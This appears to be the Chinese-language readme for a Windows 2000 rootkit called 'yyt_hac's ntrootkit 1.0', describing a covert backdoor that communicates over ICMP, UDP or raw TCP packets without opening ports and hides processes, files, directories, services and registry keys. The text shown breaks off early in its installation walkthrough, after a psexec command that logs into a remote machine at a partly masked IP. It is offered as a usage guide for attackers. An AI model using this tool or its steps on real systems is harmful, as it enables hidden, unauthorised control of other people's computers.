cn_rtreadme10.txt

国外rootkit成员写的NT_rootkit源代码.

				yyt_hac's ntrootkit 1.0 使用说明

一、简介
   本ntrootkit采用无连接协议，不开端口，有四种协议可以选择(0:userdefined,1:icmp,2:udp,3:tcp)，注意第三种
方式，它只是使用了tcp数据包进行通讯，并没有建立tcp连接，用这种方式只要把目标端口设置成任意一个目标机器上
开的端口，一般都会成功的机会很大。它隐藏进程，文件，目录，服务，注册表项，提供一些很有用的命令。
二、使用环境
   Windows 2000系列操作系统（包括客户端和服务器端）
三、使用步骤
说明：
下面是我在命令行下的使用结果，只要使用过命令行工具的人应该都可以看懂，/*.....*/之间的部分是我加的注释。

1、安装服务器端

F:\letmein>psexec \\202.39.*.* cmd.exe  /* 用psexec登录远程机器 */

PsExec v1.31 - execute processes remotely
Copyright (C) 2001-2002 Mark Russinovich
www.sysinternals.com


Microsoft Windows 2000 [